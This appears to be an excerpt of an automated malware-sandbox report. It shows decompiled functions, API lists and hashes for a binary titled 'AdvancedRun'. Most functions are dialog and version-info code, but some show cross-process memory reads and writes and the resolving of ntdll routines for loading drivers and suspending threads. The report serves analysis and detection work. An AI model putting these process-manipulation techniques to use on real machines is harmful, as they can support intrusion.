                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000007D0), ref: 0040A641
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040A648
                                                                                                                • memset.MSVCRT ref: 0040A66E
                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,00008288,00000000), ref: 0040A685
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A69E
                                                                                                                • VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0040A6A8
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040A6DC
                                                                                                                • GetLastError.KERNEL32 ref: 0040A6E4
                                                                                                                • GetLastError.KERNEL32(?,00402225,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040A6F1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleProcProcessVirtual$FreeMemoryModule$AllocErrorLastWritememsetstrlen$CloseLibraryObjectOpenReadResumeSingleThreadWait
                                                                                                                • String ID: CreateProcessW$D$GetLastError$kernel32.dll
                                                                                                                • API String ID: 1572607441-20550370
                                                                                                                • Opcode ID: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction ID: 438c2ff444ec8f0d87d8749b995af300a635889f814f068fc812e1417cff7fa3
                                                                                                                • Opcode Fuzzy Hash: 10f7c0c23a9a0f5367f9f105db89101955ccd8852da439e16b2e798f9a4d6596
                                                                                                                • Instruction Fuzzy Hash: 557127B1800219EFCB109FA0DD8499E7BB5FF08344F14457AF949B6290CB799E90DF59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401093, Relevance: 47.4, APIs: 26, Strings: 1, Instructions: 184COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00401093(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
				struct tagPOINT _v12;
				void* __esi;
				void* _t47;
				struct HBRUSH__* _t56;
				void* _t61;
				unsigned int _t63;
				void* _t68;
				struct HWND__* _t69;
				struct HWND__* _t70;
				void* _t73;
				unsigned int _t74;
				struct HWND__* _t76;
				struct HWND__* _t77;
				struct HWND__* _t78;
				struct HWND__* _t79;
				unsigned int _t85;
				struct HWND__* _t87;
				struct HWND__* _t89;
				struct HWND__* _t90;
				struct tagPOINT _t96;
				struct tagPOINT _t98;
				signed short _t103;
				void* _t106;
				void* _t117;

				_t106 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t47 = _a4 - 0x110;
				_t117 = __ecx;
				if(_t47 == 0) {
					__eflags =  *0x40feb0;
					if(__eflags != 0) {
						SetDlgItemTextW( *(__ecx + 0x10), 0x3ee, 0x40feb0);
					} else {
						ShowWindow(GetDlgItem( *(__ecx + 0x10), 0x3ed), 0);
						ShowWindow(GetDlgItem( *(_t117 + 0x10), 0x3ee), 0);
					}
					SetWindowTextW( *(_t117 + 0x10), L"AdvancedRun");
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ea, _t117 + 0x40);
					SetDlgItemTextW( *(_t117 + 0x10), 0x3ec, _t117 + 0x23e);
					E0040103E(_t117, __eflags);
					E00404DA9(_t106,  *(_t117 + 0x10), 4);
					goto L30;
				} else {
					_t61 = _t47 - 1;
					if(_t61 == 0) {
						_t103 = _a8;
						_t63 = _t103 >> 0x10;
						__eflags = _t103 - 1;
						if(_t103 == 1) {
							L24:
							__eflags = _t63;
							if(_t63 != 0) {
								goto L30;
							} else {
								EndDialog( *(_t117 + 0x10), _t103 & 0x0000ffff);
								DeleteObject( *(_t117 + 0x43c));
								goto L8;
							}
						} else {
							__eflags = _t103 - 2;
							if(_t103 != 2) {
								goto L30;
							} else {
								goto L24;
							}
						}
					} else {
						_t68 = _t61 - 0x27;
						if(_t68 == 0) {
							_t69 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
							__eflags = _a12 - _t69;
							if(_a12 != _t69) {
								__eflags =  *0x40ff30;
								if( *0x40ff30 == 0) {
									goto L30;
								} else {
									_t70 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
									__eflags = _a12 - _t70;
									if(_a12 != _t70) {
										goto L30;
									} else {
										goto L18;
									}
								}
							} else {
								L18:
								SetBkMode(_a8, 1);
								SetTextColor(_a8, 0xc00000);
								_t56 = GetSysColorBrush(0xf);
							}
						} else {
							_t73 = _t68 - 0xc8;
							if(_t73 == 0) {
								_t74 = _a12;
								_t96 = _t74 & 0x0000ffff;
								_v12.x = _t96;
								_v12.y = _t74 >> 0x10;
								_t76 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
								_push(_v12.y);
								_a8 = _t76;
								_t77 = ChildWindowFromPoint( *(_t117 + 0x10), _t96);
								__eflags = _t77 - _a8;
								if(_t77 != _a8) {
									__eflags =  *0x40ff30;
									if( *0x40ff30 == 0) {
										goto L30;
									} else {
										_t78 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
										_push(_v12.y);
										_t79 = ChildWindowFromPoint( *(_t117 + 0x10), _v12.x);
										__eflags = _t79 - _t78;
										if(_t79 != _t78) {
											goto L30;
										} else {
											goto L13;
										}
									}
								} else {
									L13:
									SetCursor(LoadCursorW(GetModuleHandleW(0), 0x67));
									goto L8;
								}
							} else {
								if(_t73 != 0) {
									L30:
									_t56 = 0;
									__eflags = 0;
								} else {
									_t85 = _a12;
									_t98 = _t85 & 0x0000ffff;
									_v12.x = _t98;
									_v12.y = _t85 >> 0x10;
									_t87 = GetDlgItem( *(__ecx + 0x10), 0x3ec);
									_push(_v12.y);
									_a8 = _t87;
									if(ChildWindowFromPoint( *(_t117 + 0x10), _t98) != _a8) {
										__eflags =  *0x40ff30;
										if( *0x40ff30 == 0) {
											goto L30;
										} else {
											_t89 = GetDlgItem( *(_t117 + 0x10), 0x3ee);
											_push(_v12.y);
											_t90 = ChildWindowFromPoint( *(_t117 + 0x10), _v12);
											__eflags = _t90 - _t89;
											if(_t90 != _t89) {
												goto L30;
											} else {
												_push(0x40ff30);
												goto L7;
											}
										}
									} else {
										_push(_t117 + 0x23e);
										L7:
										_push( *(_t117 + 0x10));
										E00404F7E();
										L8:
										_t56 = 1;
									}
								}
							}
						}
					}
				}
				return _t56;
			}



























                                                                                                                0x00401093
                                                                                                                0x00401096
                                                                                                                0x00401097
                                                                                                                0x0040109b
                                                                                                                0x004010a3
                                                                                                                0x004010a5
                                                                                                                0x00401270
                                                                                                                0x00401278
                                                                                                                0x004012b3
                                                                                                                0x0040127a
                                                                                                                0x00401293
                                                                                                                0x004012a2
                                                                                                                0x004012a2
                                                                                                                0x004012c1
                                                                                                                0x004012d9
                                                                                                                0x004012ea
                                                                                                                0x004012ec
                                                                                                                0x004012f6
                                                                                                                0x00000000
                                                                                                                0x004010ab
                                                                                                                0x004010ab
                                                                                                                0x004010ac
                                                                                                                0x00401231
                                                                                                                0x00401236
                                                                                                                0x00401239
                                                                                                                0x0040123d
                                                                                                                0x00401249
                                                                                                                0x00401249
                                                                                                                0x0040124c
                                                                                                                0x00000000
                                                                                                                0x00401252
                                                                                                                0x00401259
                                                                                                                0x00401265
                                                                                                                0x00000000
                                                                                                                0x00401265
                                                                                                                0x0040123f
                                                                                                                0x0040123f
                                                                                                                0x00401243
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00401243
                                                                                                                0x004010b2
                                                                                                                0x004010b2
                                                                                                                0x004010b5
                                                                                                                0x004011e1
                                                                                                                0x004011e3
                                                                                                                0x004011e6
                                                                                                                0x0040120e
                                                                                                                0x00401216
                                                                                                                0x00000000
                                                                                                                0x0040121c
                                                                                                                0x00401224
                                                                                                                0x00401226
                                                                                                                0x00401229
                                                                                                                0x00000000
                                                                                                                0x0040122f
                                                                                                                0x00000000
                                                                                                                0x0040122f
                                                                                                                0x00401229
                                                                                                                0x004011e8
                                                                                                                0x004011e8
                                                                                                                0x004011ed
                                                                                                                0x004011fb
                                                                                                                0x00401203
                                                                                                                0x00401203
                                                                                                                0x004010bb
                                                                                                                0x004010bb
                                                                                                                0x004010c0
                                                                                                                0x00401151
                                                                                                                0x0040115a
                                                                                                                0x00401168
                                                                                                                0x0040116b
                                                                                                                0x0040116e
                                                                                                                0x00401170
                                                                                                                0x00401173
                                                                                                                0x00401180
                                                                                                                0x00401182
                                                                                                                0x00401185
                                                                                                                0x004011a4
                                                                                                                0x004011ac
                                                                                                                0x00000000
                                                                                                                0x004011b2
                                                                                                                0x004011ba
                                                                                                                0x004011bc
                                                                                                                0x004011c7
                                                                                                                0x004011c9
                                                                                                                0x004011cb
                                                                                                                0x00000000
                                                                                                                0x004011d1
                                                                                                                0x00000000
                                                                                                                0x004011d1
                                                                                                                0x004011cb
                                                                                                                0x00401187
                                                                                                                0x00401187
                                                                                                                0x00401199
                                                                                                                0x00000000
                                                                                                                0x00401199
                                                                                                                0x004010c6
                                                                                                                0x004010c8
                                                                                                                0x004012fd
                                                                                                                0x004012fd
                                                                                                                0x004012fd
                                                                                                                0x004010ce
                                                                                                                0x004010ce
                                                                                                                0x004010d7
                                                                                                                0x004010e5
                                                                                                                0x004010e8
                                                                                                                0x004010eb
                                                                                                                0x004010ed
                                                                                                                0x004010f0
                                                                                                                0x00401102
                                                                                                                0x0040111d
                                                                                                                0x00401125
                                                                                                                0x00000000
                                                                                                                0x0040112b
                                                                                                                0x00401133
                                                                                                                0x00401135
                                                                                                                0x00401140
                                                                                                                0x00401142
                                                                                                                0x00401144
                                                                                                                0x00000000
                                                                                                                0x0040114a
                                                                                                                0x0040114a
                                                                                                                0x00000000
                                                                                                                0x0040114a
                                                                                                                0x00401144
                                                                                                                0x00401104
                                                                                                                0x0040110a
                                                                                                                0x0040110b
                                                                                                                0x0040110b
                                                                                                                0x0040110e
                                                                                                                0x00401115
                                                                                                                0x00401117
                                                                                                                0x00401117
                                                                                                                0x00401102
                                                                                                                0x004010c8
                                                                                                                0x004010c0
                                                                                                                0x004010b5
                                                                                                                0x004010ac
                                                                                                                0x00401303

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                • String ID: AdvancedRun
                                                                                                                • API String ID: 829165378-481304740
                                                                                                                • Opcode ID: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction ID: 224fbb10fd18d8c83ffedf6f1f5ae1765c75c0bde1a98b5884793aa0480d770d
                                                                                                                • Opcode Fuzzy Hash: a07d2d5b487f31c3e1d27064e8330fba163acc1cc8c3fec135df1b57c4fd270f
                                                                                                                • Instruction Fuzzy Hash: 12517D31510308EBDB216FA0DD84E6A7BB6FB44304F104A3AFA11B65F1CB79A954EB18
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408E31, Relevance: 45.6, APIs: 13, Strings: 13, Instructions: 57libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00408E31() {
				void* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t14;

				if( *0x41c4ac == 0) {
					_t2 = GetModuleHandleW(L"ntdll.dll");
					 *0x41c4ac = _t2;
					 *0x41c47c = GetProcAddress(_t2, "NtQuerySystemInformation");
					 *0x41c480 = GetProcAddress( *0x41c4ac, "NtLoadDriver");
					 *0x41c484 = GetProcAddress( *0x41c4ac, "NtUnloadDriver");
					 *0x41c488 = GetProcAddress( *0x41c4ac, "NtOpenSymbolicLinkObject");
					 *0x41c48c = GetProcAddress( *0x41c4ac, "NtQuerySymbolicLinkObject");
					 *0x41c490 = GetProcAddress( *0x41c4ac, "NtQueryObject");
					 *0x41c494 = GetProcAddress( *0x41c4ac, "NtOpenThread");
					 *0x41c498 = GetProcAddress( *0x41c4ac, "NtClose");
					 *0x41c49c = GetProcAddress( *0x41c4ac, "NtQueryInformationThread");
					 *0x41c4a0 = GetProcAddress( *0x41c4ac, "NtSuspendThread");
					 *0x41c4a4 = GetProcAddress( *0x41c4ac, "NtResumeThread");
					_t14 = GetProcAddress( *0x41c4ac, "NtTerminateThread");
					 *0x41c4a8 = _t14;
					return _t14;
				}
				return _t1;
			}






                                                                                                                0x00408e38
                                                                                                                0x00408e44
                                                                                                                0x00408e56
                                                                                                                0x00408e68
                                                                                                                0x00408e7a
                                                                                                                0x00408e8c
                                                                                                                0x00408e9e
                                                                                                                0x00408eb0
                                                                                                                0x00408ec2
                                                                                                                0x00408ed4
                                                                                                                0x00408ee6
                                                                                                                0x00408ef8
                                                                                                                0x00408f0a
                                                                                                                0x00408f1c
                                                                                                                0x00408f21
                                                                                                                0x00408f23
                                                                                                                0x00000000
                                                                                                                0x00408f28
                                                                                                                0x00408f29

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,004097C3), ref: 00408E44
                                                                                                                • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00408E5B
                                                                                                                • GetProcAddress.KERNEL32(NtLoadDriver), ref: 00408E6D
                                                                                                                • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 00408E7F
                                                                                                                • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 00408E91
                                                                                                                • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 00408EA3
                                                                                                                • GetProcAddress.KERNEL32(NtQueryObject), ref: 00408EB5
                                                                                                                • GetProcAddress.KERNEL32(NtOpenThread), ref: 00408EC7
                                                                                                                • GetProcAddress.KERNEL32(NtClose), ref: 00408ED9
                                                                                                                • GetProcAddress.KERNEL32(NtQueryInformationThread), ref: 00408EEB
                                                                                                                • GetProcAddress.KERNEL32(NtSuspendThread), ref: 00408EFD
                                                                                                                • GetProcAddress.KERNEL32(NtResumeThread), ref: 00408F0F
                                                                                                                • GetProcAddress.KERNEL32(NtTerminateThread), ref: 00408F21
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: NtClose$NtLoadDriver$NtOpenSymbolicLinkObject$NtOpenThread$NtQueryInformationThread$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeThread$NtSuspendThread$NtTerminateThread$NtUnloadDriver$ntdll.dll
                                                                                                                • API String ID: 667068680-4280973841
                                                                                                                • Opcode ID: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction ID: 9046f7da5280d7be643cb990a4133c03c86fae9b85e8e19c009a309f84c5646f
                                                                                                                • Opcode Fuzzy Hash: 0e514bbc216ec6ed683cf9c679d1a897357692730977d90f559606f31b4d1217
                                                                                                                • Instruction Fuzzy Hash: 6611AD74DC8315EECB516FB1BCE9AA67E61EB08760710C437A809632B1D77A8018DF4C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408ADB, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 216windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 45%
                                                                                                                			E00408ADB(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, void* _a8, unsigned int _a12) {
				void _v259;
				void _v260;
				void _v515;
				void _v516;
				char _v1048;
				void _v1052;
				void _v1056;
				void _v1560;
				long _v1580;
				void _v3626;
				char _v3628;
				void _v5674;
				char _v5676;
				void _v9770;
				short _v9772;
				void* __edi;
				void* _t45;
				void* _t60;
				int _t61;
				int _t63;
				int _t64;
				long _t68;
				struct HWND__* _t94;
				signed int _t103;
				intOrPtr _t127;
				unsigned int _t130;
				void* _t132;
				void* _t135;

				E0040B550(0x2628, __ecx);
				_t45 = _a8 - 0x110;
				if(_t45 == 0) {
					E00404DA9(__edx, _a4, 4);
					_v9772 = 0;
					memset( &_v9770, 0, 0xffe);
					_t103 = 5;
					memcpy( &_v1580, L"{Unknown}", _t103 << 2);
					memset( &_v1560, 0, 0x1f6);
					_v260 = 0;
					memset( &_v259, 0, 0xff);
					_v516 = 0;
					memset( &_v515, 0, 0xff);
					_v5676 = 0;
					memset( &_v5674, 0, 0x7fe);
					_v3628 = 0;
					memset( &_v3626, 0, 0x7fe);
					_t135 = _t132 + 0x5c;
					_t60 = GetCurrentProcess();
					_t105 =  &_v260;
					_a8 = _t60;
					_t61 = ReadProcessMemory(_t60,  *0x40f3bc,  &_v260, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00404FE0( &_v5676,  &_v260, 4);
						_pop(_t105);
					}
					_t63 = ReadProcessMemory(_a8,  *0x40f3b0,  &_v516, 0x80, 0);
					__eflags = _t63;
					if(_t63 != 0) {
						E00404FE0( &_v3628,  &_v516, 0);
						_pop(_t105);
					}
					_t64 = E00404BD3();
					__eflags = _t64;
					if(_t64 == 0) {
						E004090EE();
					} else {
						E00409172();
					}
					__eflags =  *0x4101b8;
					if(__eflags != 0) {
						L17:
						_v1056 = 0;
						memset( &_v1052, 0, 0x218);
						_t127 =  *0x40f5d4; // 0x0
						_t135 = _t135 + 0xc;
						_t68 = GetCurrentProcessId();
						_push(_t127);
						_push(_t68);
						 *0x40f84c = 0;
						E004092F0(_t105, __eflags);
						__eflags =  *0x40f84c; // 0x0
						if(__eflags != 0) {
							memcpy( &_v1056, 0x40f850, 0x21c);
							_t135 = _t135 + 0xc;
							__eflags =  *0x40f84c; // 0x0
							if(__eflags != 0) {
								wcscpy( &_v1580, E00404B3E( &_v1048));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x4101bc;
						if(__eflags == 0) {
							L20:
							_push( &_v3628);
							_push( &_v5676);
							_push( *0x40f3b0);
							_push( *0x40f3bc);
							_push( *0x40f3ac);
							_push( *0x40f394);
							_push( *0x40f398);
							_push( *0x40f3a0);
							_push( *0x40f3a4);
							_push( *0x40f39c);
							_push( *0x40f3a8);
							_push( &_v1580);
							_push( *0x40f5d4);
							_push( *0x40f5c8);
							_push(L"Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n");
							_push(0x800);
							_push( &_v9772);
							L0040B1EC();
							SetDlgItemTextW(_a4, 0x3ea,  &_v9772);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t45 == 1) {
					_t130 = _a12;
					if(_t130 >> 0x10 == 0) {
						if(_t130 == 3) {
							_t94 = GetDlgItem(_a4, 0x3ea);
							_a4 = _t94;
							SendMessageW(_t94, 0xb1, 0, 0xffff);
							SendMessageW(_a4, 0x301, 0, 0);
							SendMessageW(_a4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}































                                                                                                                0x00408ae3
                                                                                                                0x00408aeb
                                                                                                                0x00408af3
                                                                                                                0x00408b76
                                                                                                                0x00408b8a
                                                                                                                0x00408b91
                                                                                                                0x00408b98
                                                                                                                0x00408bb1
                                                                                                                0x00408bb3
                                                                                                                0x00408bc6
                                                                                                                0x00408bcc
                                                                                                                0x00408bda
                                                                                                                0x00408be0
                                                                                                                0x00408bf3
                                                                                                                0x00408bfa
                                                                                                                0x00408c0b
                                                                                                                0x00408c12
                                                                                                                0x00408c17
                                                                                                                0x00408c1a
                                                                                                                0x00408c2c
                                                                                                                0x00408c39
                                                                                                                0x00408c3d
                                                                                                                0x00408c3f
                                                                                                                0x00408c41
                                                                                                                0x00408c52
                                                                                                                0x00408c58
                                                                                                                0x00408c58
                                                                                                                0x00408c6f
                                                                                                                0x00408c71
                                                                                                                0x00408c73
                                                                                                                0x00408c83
                                                                                                                0x00408c89
                                                                                                                0x00408c89
                                                                                                                0x00408c8a
                                                                                                                0x00408c8f
                                                                                                                0x00408c91
                                                                                                                0x00408c9a
                                                                                                                0x00408c93
                                                                                                                0x00408c93
                                                                                                                0x00408c93
                                                                                                                0x00408c9f
                                                                                                                0x00408ca5
                                                                                                                0x00408caf
                                                                                                                0x00408cbc
                                                                                                                0x00408cc2
                                                                                                                0x00408cc7
                                                                                                                0x00408ccd
                                                                                                                0x00408cd0
                                                                                                                0x00408cd6
                                                                                                                0x00408cd7
                                                                                                                0x00408cd8
                                                                                                                0x00408cde
                                                                                                                0x00408ce3
                                                                                                                0x00408ceb
                                                                                                                0x00408cfe
                                                                                                                0x00408d03
                                                                                                                0x00408d06
                                                                                                                0x00408d0c
                                                                                                                0x00408d21
                                                                                                                0x00408d27
                                                                                                                0x00408d0c
                                                                                                                0x00000000
                                                                                                                0x00408ca7
                                                                                                                0x00408ca7
                                                                                                                0x00408cad
                                                                                                                0x00408d28
                                                                                                                0x00408d2e
                                                                                                                0x00408d35
                                                                                                                0x00408d36
                                                                                                                0x00408d42
                                                                                                                0x00408d48
                                                                                                                0x00408d4e
                                                                                                                0x00408d54
                                                                                                                0x00408d5a
                                                                                                                0x00408d60
                                                                                                                0x00408d66
                                                                                                                0x00408d6c
                                                                                                                0x00408d72
                                                                                                                0x00408d73
                                                                                                                0x00408d7f
                                                                                                                0x00408d85
                                                                                                                0x00408d8a
                                                                                                                0x00408d8f
                                                                                                                0x00408d90
                                                                                                                0x00408da8
                                                                                                                0x00408db9
                                                                                                                0x00408dbf
                                                                                                                0x00408dc5
                                                                                                                0x00408dc5
                                                                                                                0x00000000
                                                                                                                0x00408cad
                                                                                                                0x00408ca5
                                                                                                                0x00408af6
                                                                                                                0x00408afc
                                                                                                                0x00408b07
                                                                                                                0x00408b2a
                                                                                                                0x00408b38
                                                                                                                0x00408b53
                                                                                                                0x00408b56
                                                                                                                0x00408b62
                                                                                                                0x00408b6a
                                                                                                                0x00408b6a
                                                                                                                0x00408b2a
                                                                                                                0x00408b07
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • {Unknown}, xrefs: 00408BA5
                                                                                                                • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                • API String ID: 4111938811-1819279800
                                                                                                                • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                                • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                                • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040B04D, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0040B04D(intOrPtr* __edi, short* _a4) {
				int _v8;
				void* _v12;
				void* _v16;
				int _v20;
				long _v60;
				char _v572;
				void* __esi;
				int _t47;
				void* _t50;
				signed short* _t76;
				void* _t81;
				void* _t84;
				intOrPtr* _t96;
				int _t97;

				_t96 = __edi;
				_t97 = 0;
				_v20 = 0;
				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
				_v8 = _t47;
				if(_t47 > 0) {
					_t50 = E00405AA7(__edi);
					_push(_v8);
					L0040B26C();
					_t84 = _t50;
					GetFileVersionInfoW(_a4, 0, _v8, _t84);
					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
						_t81 = _v12;
						_t11 = _t81 + 0x30; // 0x4d46e853
						 *((intOrPtr*)(__edi + 4)) =  *_t11;
						_t13 = _t81 + 8; // 0x8d50ffff
						 *__edi =  *_t13;
						_t14 = _t81 + 0x14; // 0x5900004d
						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
						_t16 = _t81 + 0x10; // 0x65e850ff
						 *((intOrPtr*)(__edi + 8)) =  *_t16;
						_t18 = _t81 + 0x24; // 0xf4680000
						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
						_t20 = _t81 + 0x28; // 0xbb0040cd
						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
					}
					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
						L5:
						wcscpy( &_v60, L"040904E4");
					} else {
						_t76 = _v16;
						_push(_t76[1] & 0x0000ffff);
						_push( *_t76 & 0x0000ffff);
						_push(L"%4.4X%4.4X");
						_push(0x14);
						_push( &_v60);
						L0040B1EC();
						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
							goto L5;
						}
					}
					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
					_push(_t84);
					_t97 = 1;
					L0040B272();
				}
				return _t97;
			}

















                                                                                                                0x0040b04d
                                                                                                                0x0040b05e
                                                                                                                0x0040b060
                                                                                                                0x0040b063
                                                                                                                0x0040b06a
                                                                                                                0x0040b06d
                                                                                                                0x0040b076
                                                                                                                0x0040b07b
                                                                                                                0x0040b07e
                                                                                                                0x0040b084
                                                                                                                0x0040b08e
                                                                                                                0x0040b0a8
                                                                                                                0x0040b0aa
                                                                                                                0x0040b0ad
                                                                                                                0x0040b0b0
                                                                                                                0x0040b0b3
                                                                                                                0x0040b0b6
                                                                                                                0x0040b0b8
                                                                                                                0x0040b0bb
                                                                                                                0x0040b0be
                                                                                                                0x0040b0c1
                                                                                                                0x0040b0c4
                                                                                                                0x0040b0c7
                                                                                                                0x0040b0ca
                                                                                                                0x0040b0cd
                                                                                                                0x0040b0cd
                                                                                                                0x0040b0e5
                                                                                                                0x0040b11f
                                                                                                                0x0040b128
                                                                                                                0x0040b0e7
                                                                                                                0x0040b0e7
                                                                                                                0x0040b0f1
                                                                                                                0x0040b0f2
                                                                                                                0x0040b0f3
                                                                                                                0x0040b0fb
                                                                                                                0x0040b0fd
                                                                                                                0x0040b0fe
                                                                                                                0x0040b11d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040b11d
                                                                                                                0x0040b13c
                                                                                                                0x0040b151
                                                                                                                0x0040b166
                                                                                                                0x0040b17b
                                                                                                                0x0040b190
                                                                                                                0x0040b1a5
                                                                                                                0x0040b1ba
                                                                                                                0x0040b1cf
                                                                                                                0x0040b1d6
                                                                                                                0x0040b1d7
                                                                                                                0x0040b1d8
                                                                                                                0x0040b1de
                                                                                                                0x0040b1e3

                                                                                                                APIs
